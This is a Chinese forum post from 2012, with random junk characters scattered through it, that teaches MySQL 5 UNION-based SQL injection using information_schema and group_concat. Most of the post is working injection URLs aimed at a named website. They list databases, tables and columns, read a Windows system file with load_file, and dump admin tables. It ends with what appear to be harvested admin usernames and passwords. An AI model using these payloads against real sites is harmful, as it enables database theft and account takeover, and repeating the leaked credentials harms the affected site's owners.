此方法只适用于Mysql 5.0以及5.0以上版本 注入方法和mysql 5 类似
: s: O' Z1 n' O- n4 p但此方法大大提高了读取数据库的速度,此方法并非本人原创,原创出处是国外某牛人2 y( N. ?, \1 t% S1 E0 k
2 j6 q ]1 U& X% {
7 |% d; V ?, A* F4 R7 ]' Z; K. o
优点在于可以利用information_schema库与group_concat的配合 来达到一次性读取出指定数据库里的内容,并且在limit被限制的情况下依然可以注入
0 {4 A9 V2 X, I+ C/ u3 _/ z' Z7 |8 x0 s
; y0 d7 ?4 r( V3 R缺点 当一个库存在几百甚至几千个表和表字段和数据的时候 读取出数据的时间会相当的慢...3 W: h' v/ M/ q
6 s- p2 @- b* |( i% I; P
下面用简单实例来演示 原理不多说,相信经常玩注入的朋友都知道了.只挑重要部分实例演示
/ u- v! v! q( F+ ^0 C2 Z+ ?$ O在注入时根据实际情况作出变化 比如过滤了空格,使用/**/ , + 等等
: \9 x1 Y2 n2 A8 `/ [
1 p+ t- e: Z* E% Vhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,17
* o* b1 l4 P6 m: i: w& h8 K
5 \- @9 X' l4 F* J& O b读出所有库:1 L, i# p2 S1 L8 d# t: Z+ i
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA4 Y; b) V, l! G/ s
7 v8 L" p# w' T' m
: j8 o. l) M; A k. b5 C
1 d% P6 y) s) f& K+ h; R y. i读出所有表:, N( ^8 ~+ Y$ H' y8 ~% F# C9 n3 f, @
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()# i7 x" Z( i& ^% a: w' ?
: P m* J* z. _6 Y {- P读出所有表字段:9 `$ y8 h: R! L$ ]
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)3 y0 [% p+ K \' a
*/ (97,100,109,105,110)为admin的ascii码 依次类推
5 y/ ~/ X' _6 S6 y* W5 p" U( M9 q! u8 }- Q9 D* n- `) I# W
读出所有表字段里的内容:: o, j/ j; l2 r" G E* ~9 ^. }+ H
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin& o. r' ?4 ^! X* H4 d. H1 j
+ M( f, G% M7 p
: n& \ {2 p9 X+ N7 E- V T
& g5 y" B2 b' Q2 e$ b- }; E
9 s: y) R% w. w: V1 [2 }/ M0 A9 G% y" b, U" X, k
% p \, @7 t! E ahttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),load_file(CHAR(99, 58, 92, 98, 111, 111, 116, 46, 105, 110, 105)),4,5,6,7+%23
6 s2 W" s, C2 k+ R$ ^* K
# a8 C ^# C! ?1 @* g" e& p0 `6 X! L: Y6 R4 h0 X
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(schema_name),4,5,6,7+from+information_schema.schemata%23
: Y5 d! U, U( _/ o5 H: j
: H7 I3 s8 S2 ]http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.COLUMNS where table_schema=database()+and+table_name=char(97,100,109,105,110)%23/ G, w$ L7 R8 t" u
' T7 p0 U! ?4 u1 I4 t
! ~: `9 R" ~7 n+ o- |% u6 b
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(admin_name,0x3a,admin_password),4,5,6,7+from+admin%23
2 |1 s5 V; n: z9 v8 [2 c y5 ^5 _4 v( e6 b. U1 W
& [+ \- g0 G) W7 M% j$ v2 s7 l webmaster:dzb521123,simlab:simadmin20043233
2 [+ H4 }0 n: @ |
发表于 2012-9-13 16:37:34
收藏
支持
反对